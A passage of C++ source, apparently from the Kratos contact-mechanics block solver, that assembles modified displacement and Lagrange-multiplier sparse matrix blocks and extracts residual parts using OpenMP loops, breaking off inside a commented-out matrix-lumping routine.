K_disp_modified_ptr_aux1[0] = 0;
#pragma omp parallel
{
#pragma omp for
for (int i=0; i<static_cast<int>(rA.size1()); i++) {
if ( mWhichBlockType[i] == BlockType::OTHER) { //either KNN or KNM or KNSI or KNSA
ComputeNonZeroColumnsDispDoFs( index1, index2, values, i, other_dof_initial_index, K_disp_modified_ptr_aux1);
} else if ( mWhichBlockType[i] == BlockType::MASTER) { //either KMN or KMM or KMSI or KMLM
ComputeNonZeroColumnsDispDoFs( index1, index2, values, i, master_dof_initial_index, K_disp_modified_ptr_aux1);
} else if ( mWhichBlockType[i] == BlockType::SLAVE_INACTIVE) { //either KSIN or KSIM or KSISI or KSISA
ComputeNonZeroColumnsDispDoFs( index1, index2, values, i, slave_inactive_dof_initial_index, K_disp_modified_ptr_aux1);
} else if ( mWhichBlockType[i] == BlockType::LM_ACTIVE) { //either KLMAM or KLMASI or KLMASA
ComputeNonZeroColumnsPartialDispDoFs( index1, index2, values, i, assembling_slave_dof_initial_index, K_disp_modified_ptr_aux1);
}
}
}
// We initialize the final sparse matrix
std::partial_sum(K_disp_modified_ptr_aux1, K_disp_modified_ptr_aux1 + nrows + 1, K_disp_modified_ptr_aux1);
const SizeType nonzero_values_aux1 = K_disp_modified_ptr_aux1[nrows];
IndexType* aux_index2_K_disp_modified_aux1 = new IndexType[nonzero_values_aux1];
double* aux_val_K_disp_modified_aux1 = new double[nonzero_values_aux1];
#pragma omp parallel
{
#pragma omp for
for (int i=0; i<static_cast<int>(rA.size1()); i++) {
if ( mWhichBlockType[i] == BlockType::OTHER) { //either KNN or KNM or KNSI or KNSA
ComputeAuxiliarValuesDispDoFs( index1, index2, values, i, other_dof_initial_index, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
} else if ( mWhichBlockType[i] == BlockType::MASTER) { //either KMN or KMM or KMSI or KMLM
ComputeAuxiliarValuesDispDoFs( index1, index2, values, i, master_dof_initial_index, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
} else if ( mWhichBlockType[i] == BlockType::SLAVE_INACTIVE) { //either KSIN or KSIM or KSISI or KSISA
ComputeAuxiliarValuesDispDoFs( index1, index2, values, i, slave_inactive_dof_initial_index, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
} else if ( mWhichBlockType[i] == BlockType::LM_ACTIVE) { //either KLMAM or KLMASI or KLMASA
ComputeAuxiliarValuesPartialDispDoFs( index1, index2, values, i, assembling_slave_dof_initial_index, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
}
}
}
// Create the first auxiliar matrix
CreateMatrix(mKDispModified, nrows, ncols, K_disp_modified_ptr_aux1, aux_index2_K_disp_modified_aux1, aux_val_K_disp_modified_aux1);
// Now we create the second matrix block to sum
IndexType* K_disp_modified_ptr_aux2 = new IndexType[nrows + 1];
#pragma omp parallel for
for (int i = 0; i < static_cast<int>(nrows + 1); i++)
K_disp_modified_ptr_aux2[i] = 0;
#pragma omp parallel
{
#pragma omp for
for (int i=0; i<static_cast<int>(master_size); i++) {
IndexType K_disp_modified_cols_aux2 = 0;
// Get access to master_auxKSAN data
if (master_auxKSAN.nnz() > 0 && other_dof_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(master_auxKSAN, i, K_disp_modified_cols_aux2);
}
// Get access to master_auxKSAM data
if (master_auxKSAM.nnz() > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(master_auxKSAM, i, K_disp_modified_cols_aux2);
}
// Get access to master_auxKSASI data
if (master_auxKSASI.nnz() > 0 && slave_inactive_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(master_auxKSASI, i, K_disp_modified_cols_aux2);
}
// Get access to master_auxKSASA data
if (master_auxKSASA.nnz() > 0 && slave_active_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(master_auxKSASA, i, K_disp_modified_cols_aux2);
}
K_disp_modified_ptr_aux2[master_dof_initial_index + i + 1] = K_disp_modified_cols_aux2;
}
#pragma omp for
for (int i=0; i<static_cast<int>(slave_active_size); i++) {
IndexType K_disp_modified_cols_aux2 = 0;
// Get access to aslave_auxKSAN data
if (aslave_auxKSAN.nnz() > 0 && other_dof_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(aslave_auxKSAN, i, K_disp_modified_cols_aux2);
}
// Get access to aslave_auxKSAM data
if (aslave_auxKSAM.nnz() > 0 && master_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(aslave_auxKSAM, i, K_disp_modified_cols_aux2);
}
// Get access to aslave_auxKSASI data
if (aslave_auxKSASI.nnz() > 0 && slave_inactive_size > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(aslave_auxKSASI, i, K_disp_modified_cols_aux2);
}
// Get access to aslave_auxKSASA data
if (aslave_auxKSASA.nnz() > 0) {
SparseMatrixMultiplicationUtility::ComputeNonZeroBlocks(aslave_auxKSASA, i, K_disp_modified_cols_aux2);
}
K_disp_modified_ptr_aux2[assembling_slave_dof_initial_index + i + 1] = K_disp_modified_cols_aux2;
}
}
// We initialize the final sparse matrix
std::partial_sum(K_disp_modified_ptr_aux2, K_disp_modified_ptr_aux2 + nrows + 1, K_disp_modified_ptr_aux2);
const SizeType nonzero_values_aux2 = K_disp_modified_ptr_aux2[nrows];
IndexType* aux_index2_K_disp_modified_aux2 = new IndexType[nonzero_values_aux2];
double* aux_val_K_disp_modified_aux2 = new double[nonzero_values_aux2];
#pragma omp parallel
{
#pragma omp for
for (int i=0; i<static_cast<int>(master_size); i++) {
const IndexType row_beg = K_disp_modified_ptr_aux2[master_dof_initial_index + i];
IndexType row_end = row_beg;
// Get access to master_auxKSAN data
if (master_auxKSAN.nnz() > 0 && other_dof_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(master_auxKSAN, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, other_dof_initial_index);
}
// Get access to master_auxKSAM data
if (master_auxKSAM.nnz() > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(master_auxKSAM, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, master_dof_initial_index);
}
// Get access to master_auxKSASI data
if (master_auxKSASI.nnz() > 0 && slave_inactive_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(master_auxKSASI, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, slave_inactive_dof_initial_index);
}
// Get access to master_auxKSASA data
if (master_auxKSASA.nnz() > 0 && slave_active_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(master_auxKSASA, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, assembling_slave_dof_initial_index);
}
}
#pragma omp for
for (int i=0; i<static_cast<int>(slave_active_size); i++) {
const IndexType row_beg = K_disp_modified_ptr_aux2[assembling_slave_dof_initial_index + i];
IndexType row_end = row_beg;
// Get access to aslave_auxKSAN data
if (aslave_auxKSAN.nnz() > 0 && other_dof_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(aslave_auxKSAN, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, other_dof_initial_index);
}
// Get access to aslave_auxKSAM data
if (aslave_auxKSAM.nnz() > 0 && master_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(aslave_auxKSAM, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, master_dof_initial_index);
}
// Get access to aslave_auxKSASI data
if (aslave_auxKSASI.nnz() > 0 && slave_inactive_size > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(aslave_auxKSASI, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, slave_inactive_dof_initial_index);
}
// Get access to aslave_auxKSASA data
if (aslave_auxKSASA.nnz() > 0) {
SparseMatrixMultiplicationUtility::ComputeAuxiliarValuesBlocks(aslave_auxKSASA, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2, i, row_end, assembling_slave_dof_initial_index);
}
}
}
// Create the second auxiliar matrix
SparseMatrixType K_disp_modified_aux2(nrows, ncols);
CreateMatrix(K_disp_modified_aux2, nrows, ncols, K_disp_modified_ptr_aux2, aux_index2_K_disp_modified_aux2, aux_val_K_disp_modified_aux2);
// We sum the auxiliar matrices
SparseMatrixMultiplicationUtility::MatrixAdd<SparseMatrixType, SparseMatrixType>(mKDispModified, K_disp_modified_aux2, - 1.0);
// Finally we ensure that the matrix is structurally symmetric
EnsureStructuralSymmetryMatrix(mKDispModified);
#ifdef KRATOS_DEBUG
CheckMatrix(mKDispModified);
#endif
// // DEBUG
// LOG_MATRIX_PRETTY(rA)
// LOG_MATRIX_PRETTY(mKDispModified)
KRATOS_CATCH ("")
}
///@}
///@name Protected Access
///@{
///@}
///@name Protected Inquiry
///@{
///@}
///@name Protected LifeCycle
///@{
///@}
private:
///@name Static Member Variables
///@{
///@}
///@name Member Variables
///@{
LinearSolverPointerType mpSolverDispBlock; /// The pointer to the displacement linear solver
Flags mOptions; /// This stores the flags
IndexVectorType mMasterIndices; /// The vector storing the indices of the master nodes in contact
IndexVectorType mSlaveInactiveIndices; /// The vector storing the indices of the slave nodes in contact (Inactive)
IndexVectorType mSlaveActiveIndices; /// The vector storing the indices of the slave nodes in contact (Active)
IndexVectorType mLMInactiveIndices; /// The vector storing the indices of the LM (Inactive)
IndexVectorType mLMActiveIndices; /// The vector storing the indices of the LM (Active)
IndexVectorType mOtherIndices; /// The vector containing the indices for other DoF
IndexVectorType mGlobalToLocalIndexing; /// This vector stores the correspondance between the local and global
BlockTypeVectorType mWhichBlockType; /// This vector stores the LM block belongings
SparseMatrixType mKDispModified; /// The modified displacement block
SparseMatrixType mKLMAModified; /// The modified active LM block (inverted diagonal)
SparseMatrixType mKLMIModified; /// The modified inactive LM block (inverted diagonal)
SparseMatrixType mKSAN; /// The slave active-displacement block
SparseMatrixType mKSAM; /// The active slave-master block
SparseMatrixType mKSASI; /// The active slave-inactive slave block
SparseMatrixType mKSASA; /// The inactive slave-active slave block
SparseMatrixType mPOperator; /// The operator used for the master blocks
SparseMatrixType mCOperator; /// The operator used for the active slave block
VectorType mResidualLMActive; /// The residual of the active lagrange multipliers
VectorType mResidualLMInactive; /// The residual of the inactive lagrange multipliers
VectorType mResidualDisp; /// The residual of the rest of displacements
VectorType mLMActive; /// The solution of the active lagrange multiplies
VectorType mLMInactive; /// The solution of the inactive lagrange multiplies
VectorType mDisp; /// The solution of the rest of displacements
IndexType mEchoLevel = 0; /// The echo level of the solver
IndexType mFileCreated = 0; /// The index used to identify the file created
///@}
///@name Private Operators
///@{
///@}
///@name Private Operations
///@{
/**
* @brief This method is mean to avoid code duplication when computing the non zero terms in the Aux1 matrix
* @param Index1 The indexes of nonzero rows
* @param Index2 The indexes of nonzero columns
* @param Values The array containing the values of the matrix
* @param CurrentRow The current row computed
* @param InitialIndex The index corresponding to the current row in the global contribution
* @param Ptr The nonzero terms of each column
*/
inline void ComputeNonZeroColumnsDispDoFs(
const IndexType* Index1,
const IndexType* Index2,
const double* Values,
const int CurrentRow,
const IndexType InitialIndex,
IndexType* Ptr
)
{
const IndexType row_begin = Index1[CurrentRow];
const IndexType row_end = Index1[CurrentRow + 1];
IndexType cols = 0;
const IndexType local_row_id = mGlobalToLocalIndexing[CurrentRow] + InitialIndex;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = Index2[j];
if (mWhichBlockType[col_index] == BlockType::OTHER) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::MASTER) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) {
++cols;
}
}
Ptr[local_row_id + 1] = cols;
}
/**
* @brief This method is mean to avoid code duplication when computing the non zero terms in the Aux1 matrix
* @details The same as the previous one but not taking into account the contribution of the other dofs
* @param Index1 The indexes of nonzero rows
* @param Index2 The indexes of nonzero columns
* @param Values The array containing the values of the matrix
* @param CurrentRow The current row computed
* @param InitialIndex The index corresponding to the current row in the global contribution
* @param Ptr The nonzero terms of each column
*/
inline void ComputeNonZeroColumnsPartialDispDoFs(
const IndexType* Index1,
const IndexType* Index2,
const double* Values,
const int CurrentRow,
const IndexType InitialIndex,
IndexType* Ptr
)
{
const IndexType row_begin = Index1[CurrentRow];
const IndexType row_end = Index1[CurrentRow + 1];
IndexType cols = 0;
const IndexType local_row_id = mGlobalToLocalIndexing[CurrentRow] + InitialIndex;
for (IndexType j=row_begin; j<row_end; j++) {
const IndexType col_index = Index2[j];
if (mWhichBlockType[col_index] == BlockType::MASTER) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) {
++cols;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) {
++cols;
}
}
Ptr[local_row_id + 1] = cols;
}
/**
* @brief This method is mean to avoid code duplication when evaluate the terms of the Aux1 matrix
* @param Index1 The indexes of nonzero rows
* @param Index2 The indexes of nonzero columns
* @param Values The array containing the values of the matrix
* @param CurrentRow The current row computed
* @param InitialIndex The index corresponding to the current row in the global contribution
* @param Ptr The nonzero terms of each column
* @param AuxIndex2 The indexes of the non zero columns
* @param AuxVals The values of the final matrix
*/
inline void ComputeAuxiliarValuesDispDoFs(
const IndexType* Index1,
const IndexType* Index2,
const double* Values,
const int CurrentRow,
const IndexType InitialIndex,
IndexType* Ptr,
IndexType* AuxIndex2,
double* AuxVals
)
{
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
// Auxiliar indexes
const SizeType other_dof_initial_index = 0;
const SizeType master_dof_initial_index = other_dof_size;
const SizeType slave_inactive_dof_initial_index = master_dof_initial_index + master_size;
const SizeType assembling_slave_dof_initial_index = slave_inactive_dof_initial_index + slave_inactive_size;
// Some indexes
const IndexType local_row_id = mGlobalToLocalIndexing[CurrentRow] + InitialIndex;
const IndexType row_begin_A = Index1[CurrentRow];
const IndexType row_end_A = Index1[CurrentRow + 1];
const IndexType row_beg = Ptr[local_row_id];
IndexType row_end = row_beg;
for (IndexType j=row_begin_A; j<row_end_A; j++) {
const IndexType col_index = Index2[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
const double value = Values[j];
if (mWhichBlockType[col_index] == BlockType::OTHER) {
AuxIndex2[row_end] = local_col_id + other_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::MASTER) {
AuxIndex2[row_end] = local_col_id + master_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) {
AuxIndex2[row_end] = local_col_id + slave_inactive_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) {
AuxIndex2[row_end] = local_col_id + assembling_slave_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
}
}
}
/**
* @brief This method is mean to avoid code duplication when evaluate the terms of the Aux1 matrix
* @details The same as the previous one but not taking into account the contribution of the other dofs
* @param Index1 The indexes of nonzero rows
* @param Index2 The indexes of nonzero columns
* @param Values The array containing the values of the matrix
* @param CurrentRow The current row computed
* @param InitialIndex The index corresponding to the current row in the global contribution
* @param Ptr The nonzero terms of each column
* @param AuxIndex2 The indexes of the non zero columns
* @param AuxVals The values of the final matrix
*/
inline void ComputeAuxiliarValuesPartialDispDoFs(
const IndexType* Index1,
const IndexType* Index2,
const double* Values,
const int CurrentRow,
const IndexType InitialIndex,
IndexType* Ptr,
IndexType* AuxIndex2,
double* AuxVals
)
{
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
// Auxiliar indexes
const SizeType master_dof_initial_index = other_dof_size;
const SizeType slave_inactive_dof_initial_index = master_dof_initial_index + master_size;
const SizeType assembling_slave_dof_initial_index = slave_inactive_dof_initial_index + slave_inactive_size;
// Some indexes
const IndexType local_row_id = mGlobalToLocalIndexing[CurrentRow] + InitialIndex;
const IndexType row_begin_A = Index1[CurrentRow];
const IndexType row_end_A = Index1[CurrentRow + 1];
const IndexType row_beg = Ptr[local_row_id];
IndexType row_end = row_beg;
for (IndexType j=row_begin_A; j<row_end_A; j++) {
const IndexType col_index = Index2[j];
const IndexType local_col_id = mGlobalToLocalIndexing[col_index];
const double value = Values[j];
if (mWhichBlockType[col_index] == BlockType::MASTER) {
AuxIndex2[row_end] = local_col_id + master_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_INACTIVE) {
AuxIndex2[row_end] = local_col_id + slave_inactive_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
} else if (mWhichBlockType[col_index] == BlockType::SLAVE_ACTIVE) {
AuxIndex2[row_end] = local_col_id + assembling_slave_dof_initial_index;
AuxVals[row_end] = value;
++row_end;
}
}
}
/**
* @brief It allocates all the blocks and operators
*/
inline void AllocateBlocks()
{
// We clear the matrixes
mKDispModified.clear(); /// The modified displacement block
mKLMAModified.clear(); /// The modified active LM block (diagonal)
mKLMIModified.clear(); /// The modified inaactive LM block (diagonal)
mKSAN.clear(); /// The slave active-displacement block
mKSAM.clear(); /// The active slave-master block
mKSASI.clear(); /// The active slave-inactive slave block
mKSASA.clear(); /// The active slave-slave active block
mPOperator.clear(); /// The operator used for the master blocks
mCOperator.clear(); /// The operator used for the active slave block
mResidualLMActive.clear(); /// The residual corresponding the active LM
mResidualLMInactive.clear(); /// The residual corresponding the inactive LM
mResidualDisp.clear(); /// The residual of the displacements
mLMActive.clear(); /// The solution of the active LM
mLMInactive.clear(); /// The solution of the inactive LM
mDisp.clear(); /// The solution of the displacement
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
const SizeType slave_active_size = mSlaveActiveIndices.size();
const SizeType lm_active_size = mLMActiveIndices.size();
const SizeType lm_inactive_size = mLMInactiveIndices.size();
const SizeType total_size = other_dof_size + master_size + slave_inactive_size + slave_active_size;
// We do the allocation
mKDispModified.resize(total_size, total_size, false); /// The modified displacement block
mKLMAModified.resize(lm_active_size, lm_active_size, false); /// The modified active LM block (diagonal)
mKLMAModified.reserve(lm_active_size);
mKLMIModified.resize(lm_inactive_size, lm_inactive_size, false); /// The modified inactve LM block (diagonal)
mKLMIModified.reserve(lm_inactive_size);
mKSAN.resize(slave_active_size, other_dof_size, false); /// The slave active-displacement block
mKSAM.resize(slave_active_size, master_size, false); /// The active slave-master block
mKSASI.resize(slave_active_size, slave_inactive_size, false); /// The active slave-inactive slave block
mKSASA.resize(slave_active_size, slave_active_size, false); /// The active slave-slave active block
mPOperator.resize(master_size, slave_active_size, false); /// The operator used for the master blocks
mCOperator.resize(lm_active_size, slave_active_size, false); /// The operator used for the active slave block
mResidualLMActive.resize(lm_active_size, false ); /// The residual corresponding the active LM
mResidualLMInactive.resize(lm_inactive_size, false ); /// The residual corresponding the inactive LM
mResidualDisp.resize(total_size ); /// The residual of the displacements
mLMActive.resize(lm_active_size, false); /// The solution of the active LM
mLMInactive.resize(lm_inactive_size, false); /// The solution of the inactive LM
mDisp.resize(total_size, false); /// The solution of the displacement
}
/**
* @brief This function extracts from a vector which has the size of the overall r, the part that corresponds to u-dofs
* @param rTotalResidual The total residual of the problem
* @param ResidualU The vector containing the residual relative to the displacements
*/
inline void GetUPart (
const VectorType& rTotalResidual,
VectorType& ResidualU
)
{
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
const SizeType slave_active_size = mSlaveActiveIndices.size();
const SizeType lm_active_size = mLMActiveIndices.size();
const SizeType total_size = other_dof_size + master_size + slave_inactive_size + slave_active_size;
// Resize in case the size is not correct
if (ResidualU.size() != total_size )
ResidualU.resize (total_size, false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(other_dof_size); i++)
ResidualU[i] = rTotalResidual[mOtherIndices[i]];
// The corresponding residual for the active slave DoF's
VectorType aux_res_active_slave(slave_active_size);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(slave_active_size); i++)
aux_res_active_slave[i] = rTotalResidual[mSlaveActiveIndices[i]];
if (slave_active_size > 0) {
// We compute the complementary residual for the master dofs
VectorType aux_complement_master_residual(master_size);
TSparseSpaceType::Mult(mPOperator, aux_res_active_slave, aux_complement_master_residual);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(master_size); i++)
ResidualU[other_dof_size + i] = rTotalResidual[mMasterIndices[i]] - aux_complement_master_residual[i];
} else {
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(master_size); i++)
ResidualU[other_dof_size + i] = rTotalResidual[mMasterIndices[i]];
}
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(slave_inactive_size); i++)
ResidualU[other_dof_size + master_size + i] = rTotalResidual[mSlaveInactiveIndices[i]];
if (slave_active_size > 0) {
// We compute the complementary residual for the master dofs
VectorType aux_complement_active_lm_residual(lm_active_size);
TSparseSpaceType::Mult(mCOperator, aux_res_active_slave, aux_complement_active_lm_residual);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(lm_active_size); i++)
ResidualU[other_dof_size + master_size + slave_inactive_size + i] = rTotalResidual[mLMActiveIndices[i]] - aux_complement_active_lm_residual[i];
} else {
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(lm_active_size); i++)
ResidualU[other_dof_size + master_size + slave_inactive_size + i] = rTotalResidual[mLMActiveIndices[i]];
}
}
/**
* @brief This function extracts from a vector which has the size of the overall r, the part that corresponds to active lm-dofs
* @param rTotalResidual The total residual of the problem
* @param rResidualLMA The vector containing the residual relative to the active LM
*/
inline void GetLMAPart(
const VectorType& rTotalResidual,
VectorType& rResidualLMA
)
{
// Auxiliar sizes
const SizeType other_dof_size = mOtherIndices.size();
const SizeType master_size = mMasterIndices.size();
const SizeType slave_inactive_size = mSlaveInactiveIndices.size();
const SizeType slave_active_size = mSlaveActiveIndices.size();
// We add the other
if (slave_active_size > 0) {
// We get the displacement residual of the active slave nodes
if (rResidualLMA.size() != slave_active_size )
rResidualLMA.resize (slave_active_size, false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(rResidualLMA.size()); i++)
rResidualLMA[i] = rTotalResidual[mSlaveActiveIndices[i]];
// From the computed displacements we get the components of the displacements for each block
VectorType disp_N(other_dof_size);
VectorType disp_M(master_size);
VectorType disp_SI(slave_inactive_size);
VectorType disp_SA(slave_active_size);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(other_dof_size); i++)
disp_N[i] = mDisp[i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(master_size); i++)
disp_M[i] = mDisp[other_dof_size + i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(slave_inactive_size); i++)
disp_SI[i] = mDisp[other_dof_size + master_size + i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(slave_active_size); i++)
disp_SA[i] = mDisp[other_dof_size + master_size + slave_inactive_size + i];
VectorType aux_mult(slave_active_size);
TSparseSpaceType::Mult(mKSAN, disp_N, aux_mult);
TSparseSpaceType::UnaliasedAdd (rResidualLMA, -1.0, aux_mult);
TSparseSpaceType::Mult(mKSAM, disp_M, aux_mult);
TSparseSpaceType::UnaliasedAdd (rResidualLMA, -1.0, aux_mult);
if (slave_inactive_size > 0) {
TSparseSpaceType::Mult(mKSASI, disp_SI, aux_mult);
TSparseSpaceType::UnaliasedAdd (rResidualLMA, -1.0, aux_mult);
}
TSparseSpaceType::Mult(mKSASA, disp_SA, aux_mult);
TSparseSpaceType::UnaliasedAdd (rResidualLMA, -1.0, aux_mult);
}
}
/**
* @brief This function extracts from a vector which has the size of the overall r, the part that corresponds to inactive lm-dofs
* @param rTotalResidual The total residual of the problem
* @param rResidualLMI The vector containing the residual relative to the inactive LM
*/
inline void GetLMIPart (
const VectorType& rTotalResidual,
VectorType& rResidualLMI
)
{
// Auxiliar size
const SizeType lm_inactive_size = mLMInactiveIndices.size();
// We get the displacement residual of the active slave nodes
if (rResidualLMI.size() != lm_inactive_size )
rResidualLMI.resize (lm_inactive_size, false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(lm_inactive_size); i++)
rResidualLMI[i] = rTotalResidual[mLMInactiveIndices[i]];
}
/**
* @brief This method writes the displacement part
* @param rTotalResidual The total residual of the problem
* @param ResidualU The vector containing the residual relative to the displacements
*/
inline void SetUPart (
VectorType& rTotalResidual,
const VectorType& ResidualU
)
{
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(mOtherIndices.size()); i++)
rTotalResidual[mOtherIndices[i]] = ResidualU[i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(mMasterIndices.size()); i++)
rTotalResidual[mMasterIndices[i]] = ResidualU[mOtherIndices.size() + i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(mSlaveInactiveIndices.size()); i++)
rTotalResidual[mSlaveInactiveIndices[i]] = ResidualU[mOtherIndices.size() + mMasterIndices.size() + i];
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(mSlaveActiveIndices.size()); i++)
rTotalResidual[mSlaveActiveIndices[i]] = ResidualU[mOtherIndices.size() + mMasterIndices.size() + mSlaveInactiveIndices.size() + i];
}
/**
* @brief This method writes the active Lagrange Multiplier part
* @param rTotalResidual The total residual of the problem
* @param ResidualLMA The vector containing the residual relative to the active LM
*/
inline void SetLMAPart (
VectorType& rTotalResidual,
const VectorType& ResidualLMA
)
{
#pragma omp parallel for
for (int i = 0; i< static_cast<int>(ResidualLMA.size()); i++)
rTotalResidual[mLMActiveIndices[i]] = ResidualLMA[i];
}
/**
* @brief This method writes the inaactive Lagrange Multiplier part
* @param rTotalResidual The total residual of the problem
* @param ResidualLMI The vector containing the residual relative to the inactive LM
*/
inline void SetLMIPart (
VectorType& rTotalResidual,
const VectorType& ResidualLMI
)
{
#pragma omp parallel for
for (int i = 0; i< static_cast<int>(ResidualLMI.size()); i++)
rTotalResidual[mLMInactiveIndices[i]] = ResidualLMI[i];
}
/**
* @brief This method is intended to use to ensure the matrix is structurally symmetric
* @param rA The matrix to be checked
*/
void EnsureStructuralSymmetryMatrix (SparseMatrixType& rA)
{
// We compute the transposed matrix
const SizeType size_system_1 = rA.size1();
const SizeType size_system_2 = rA.size2();
SparseMatrixType transpose(size_system_2, size_system_1);
SparseMatrixMultiplicationUtility::TransposeMatrix<SparseMatrixType, SparseMatrixType>(transpose, rA, 0.0);
// Finally we sum the auxiliar matrices
SparseMatrixMultiplicationUtility::MatrixAdd<SparseMatrixType, SparseMatrixType>(rA, transpose, 1.0);
}
/**
* @brief This method is intended to use to check the matrix
* @param rA The matrix to be checked
*/
double CheckMatrix (const SparseMatrixType& rA)
{
// Get access to A data
const std::size_t* index1 = rA.index1_data().begin();
const std::size_t* index2 = rA.index2_data().begin();
const double* values = rA.value_data().begin();
double norm = 0.0;
for (std::size_t i=0; i<rA.size1(); ++i) {
std::size_t row_begin = index1[i];
std::size_t row_end = index1[i+1];
if (row_end - row_begin == 0)
KRATOS_WARNING("Checking sparse matrix") << "Line " << i << " has no elements" << std::endl;
for (std::size_t j=row_begin; j<row_end; j++) {
KRATOS_ERROR_IF( index2[j] > rA.size2() ) << "Array above size of A" << std::endl;
norm += values[j]*values[j];
}
}
return std::sqrt (norm);
}
/**
* @brief This method is designed to create the final solution sparse matrix from the auxiliar values
* @detail Before create it reorder the columns. It deletes the auxiliar values after compute the matrix
* @param AuxK The matrix solution
* @param NRows The number of rows of the matrix
* @param NCols The number of columns of the matrix
* @param Ptr The indexes taht indicate the number of nonzero values in each column
* @param AuxIndex2 The indexes of the nonzero columns
* @param AuxVal The array containing the values of the sparse matrix
*/
void CreateMatrix(
SparseMatrixType& AuxK,
const SizeType NRows,
const SizeType NCols,
IndexType* Ptr,
IndexType* AuxIndex2,
double* AuxVal
)
{
// We reorder the rows
SparseMatrixMultiplicationUtility::SortRows(Ptr, NRows, NCols, AuxIndex2, AuxVal);
// Finally we build the final matrix
SparseMatrixMultiplicationUtility::CreateSolutionMatrix(AuxK, NRows, NCols, Ptr, AuxIndex2, AuxVal);
// Release memory
delete[] Ptr;
delete[] AuxIndex2;
delete[] AuxVal;
}
/**
* @brief This method is intended to lump an existing matrix
* @param rA The matrix to be lumped
* @param rdiagA The resulting matrix
* @param Tolerance The tolerance considered to check if the values are almost 0
* @todo Improve the lumping in case of not pure diagonal matrix
*/
void ComputeDiagonalByLumping (
const SparseMatrixType& rA,
SparseMatrixType& rdiagA,
const double Tolerance = ZeroTolerance
)
{
// Aux values
const std::size_t size_A = rA.size1();
// VectorType diagA_vector(size_A);
//
// // In case of not pure lumped matrix
// if (rA.nnz() > size_A) {
// // Get access to A data
// const std::size_t* index1 = rA.index1_data().begin();
// const double* values = rA.value_data().begin();
//
// #pragma omp parallel for
// for (int i=0; i< static_cast<int>(size_A); i++) {
// const std::size_t row_begin = index1[i];
// const std::size_t row_end = index1[i+1];
// double temp = 0.0;
// for (std::size_t j=row_begin; j<row_end; j++)
